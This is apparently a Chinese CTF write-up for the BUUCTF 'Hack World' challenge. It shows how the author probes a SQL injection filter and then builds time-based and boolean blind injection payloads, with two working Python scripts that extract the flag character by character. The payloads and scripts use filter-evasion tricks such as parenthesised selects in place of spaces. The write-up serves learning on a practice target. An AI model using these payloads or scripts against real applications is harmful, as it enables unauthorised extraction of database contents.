首先用sqlmap跑一跑没有结果
尝试输入,测试注入点和过滤
1' bool(false)
1'# SQL Injection Checked.
1'%23 bool(false)
1' %23 Injection Checked.
1%23 Hello, glzjin wants a girlfriend.
可以发现,只要被过滤了就会显示SQL Injection Checked,通过测试
过滤了and&&、 or||、 空格 、# 、for、limit
明显的注入,但是过滤空格,*,%23%0a,limit,for等等,明显的盲注
通过测试sleep((select(flag)from(flag)where(flag)like('f%'))like('f%'))可以成功延时,构造脚本
过滤空格,*,%23%0a,limit,for
后面再回头想了一下,flag表就一条数据,不能用limit也不需要用like构造的这么复杂,可以构造sleep(ascii(mid((select(flag)from(flag)),1,1))=102)
然后看glzjin师傅的wp却是布尔型盲注
1^(cot(ascii(mid((select(flag)from(flag)),1,1))=102))^1
其中的cot函数的作用是求余切值,会得到0.6这样,最后通过异或和四舍五入最后为1(我也不是很懂为什么一定要cot)
这里讲一下like
例子
我们希望从上面的 "Persons" 表中选取居住在以 "N" 开始的城市里的人:
我们可以使用下面的 SELECT 语句:
SELECT * FROM Persons
WHERE City LIKE 'N%'
提示:"%" 可用于定义通配符(模式中缺少的字母)。
sqlmap中也有用like代替=
图片.png
图片.png
代码
import requests
def six_six_six(url):
flag = ''
while True:
for i in 'abcdefghijklmnopqrstuvwxyz0123456789{}_':
data = {'id':"sleep((select(flag)from(flag)where(flag)like('f%'))like('{i}%'))".format(i=flag+i)}
print(data)
try:
requests.post(url=url,data=data,timeout=1)
except:
flag=flag+i
print('[*]%s'%flag)
break
if i=='}':
break
print('[+]%s'%flag)
url = 'http://web43.buuoj.cn'
six_six_six(url)
还可以通过布尔盲注进行,有两种返回结果
-1=(ascii(substr((select flag from flag),1,1))>120)
我比较菜鸡,一开始怎么也看不出这个脚本的意思,经过一波测试
-1=(158=58) 返回Hello, glzjin wants a girlfriend.
-1=(58=58)返回Error Occured When Fetch Result.
-1=(158>58)返回Error Occured When Fetch Result.
-1=(158<58) 返回Hello, glzjin wants a girlfriend.
还是不太懂为什么这么构造,
这里可以揣摩出大概意思是()里的判断为true返回Error Occured When Fetch Result.(也就是flase);
()里的判断为flase返回Hello, glzjin wants a girlfriend.也就是id=1查询出的内容(也就是true)
原因是-1=flase,返回1?
-1=true,返回flase?
这样看来确实没有必要用and和or了
上脚本
import requests, threading
z = {}
def fast(n):
R, L = 126, 30
m = 0
while R >= L:
m = (R + L) // 2
#payload = '-1=(ascii(substr((select flag from flag),{0},1))>{1})'.format(n, m)
payload = '-1=(ascii(mid((select(flag)from(flag)),{0},1))>{1})'.format(n, m)
data = {"id": payload}
if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
payload = '-1=(ascii(substr((select flag from flag),{0},1))={1})'.format(n, m + 1)
data = {"id": payload}
#如果不返回Hello, glzjin wants a girlfriend,语句为真,ascii(flag[n])>m,构造判断ascii(flag[n])=m+1?
if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
z[n] = chr(m + 1)
print(chr(m + 1))
break
#如果不返回Hello, glzjin wants a girlfriend,语句为真,返回flag[n],break,跳出
L = m + 1#直到R>L,这里L每次增加到m+1,二分法
print(m)
else:
payload = '-1=(ascii(substr((select flag from flag),{0},1))={1})'.format(n, m - 1)
data = {"id": payload}
if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
z[n] = chr(m - 1)
print(chr(m - 1))
break
R = m - 1
a = []#创建threads数组a[]
for x in range(1, 39):#这里的39需要自己测试,从小到大测试
a.append(threading.Thread(target=fast, args=(x,)))#创建线程,使用threading.Thread()方法,在这个方法中调用fast方法target=fast,args方法对fast进行传参。 把创建好的线程装到threads数组a[]中。
for x in a:
x.start()#最后通过for循环遍历线程数组。
for x in a:
x.join()#join()的作用是,在子线程完成运行之前,这个子线程的父线程将一直被阻塞。注意: join()方法的位置是在for循环外的,也就是说必须等待for循环里的两个进程都结束后,才去执行主进程。
f = ''
for x in range(1, 39):
f += z[x]
print(f)
print('ok')
参考文章
http://118.25.174.93/index.php/archives/694/#Hack%20World
http://cdusec.happyhacking.top/?post=78